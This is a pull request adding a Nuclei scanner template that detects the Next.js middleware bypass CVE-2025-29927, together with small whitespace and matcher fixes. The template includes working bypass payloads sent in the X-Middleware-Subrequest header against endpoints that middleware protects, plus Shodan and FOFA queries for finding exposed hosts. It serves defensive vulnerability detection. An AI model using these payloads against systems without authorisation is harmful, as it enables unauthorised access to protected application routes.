### PR TITLE
Added CVE-2025-29927 Detection

### DIFF
--- a/http/cves/2025/CVE-2025-29927.yaml
+++ b/http/cves/2025/CVE-2025-29927.yaml
@@ -37,7 +37,7 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}"
-    
+
     matchers:
       - type: word
         part: body
@@ -63,7 +63,7 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}{{endpoints}}"
-    
+
     matchers:
       - type: dsl
         dsl:

--- a/http/cves/2025/CVE-2025-29927.yaml
+++ b/http/cves/2025/CVE-2025-29927.yaml
@@ -68,6 +68,7 @@ http:
       - type: dsl
         dsl:
           - contains_any(to_lower(header), 'x-middleware-rewrite', 'x-middleware-next', 'x-middleware-redirect') && status_code != 200
+          - contains_any(to_lower(location), 'unauthorized') && status_code != 200
         internal: true
 
   - method: GET

--- a/http/cves/2025/CVE-2025-29927.yaml
+++ b/http/cves/2025/CVE-2025-29927.yaml
@@ -1,0 +1,87 @@
+id: CVE-2025-29927
+
+info:
+  name: Next.js Middleware Bypass
+  author: pdresearch,pdteam
+  severity: critical
+  description: |
+    Next.js contains a critical middleware bypass vulnerability affecting versions 11.1.4 through 15.2.2.
+    The vulnerability allows attackers to bypass middleware security controls by sending a specially crafted
+    'x-middleware-subrequest' header, which can lead to authorization bypass and other security control circumvention.
+  reference:
+    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
+    - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
+  remediation: |
+    Upgrade to Next.js 14.2.25 or 15.2.3 or later.
+    If upgrading is not possible, block the x-middleware-subrequest header at the WAF or server level.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cwe-id: CWE-287
+  metadata:
+    max-request: 1
+    shodan-query: x-middleware-rewrite
+    fofa-query: x-middleware-rewrite
+    product: next.js
+    vendor: zeit
+  tags: cve,cve2025,nextjs,middleware,auth-bypass
+
+flow: |
+  http(1)
+  for(let endpoint_urls of iterate(template.endpoints)){
+    set("endpoints", endpoint_urls)
+    http(2) && http(3)
+  }
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "_next/static"
+        internal: true
+
+      - type: word
+        part: header
+        words:
+          - "Next.js"
+        internal: true
+
+    extractors:
+      - type: regex
+        name: endpoints
+        part: body
+        group: 1
+        regex:
+          - "href=['\"](\\/[^\\.\"']+)['\"]"
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}{{endpoints}}"
+    
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_any(to_lower(header), 'x-middleware-rewrite', 'x-middleware-next', 'x-middleware-redirect') && status_code != 200
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}{{endpoints}}"
+    headers:
+      X-Middleware-Subrequest: "{{nextjs_bypass}}"
+
+    payloads:
+      nextjs_bypass:
+        - "middleware:middleware:middleware:middleware:middleware"
+        - "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Reference:
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
    - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

Use https://github.com/projectdiscovery/nuclei-templates-labs/pull/2 to reproduce locally.

#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)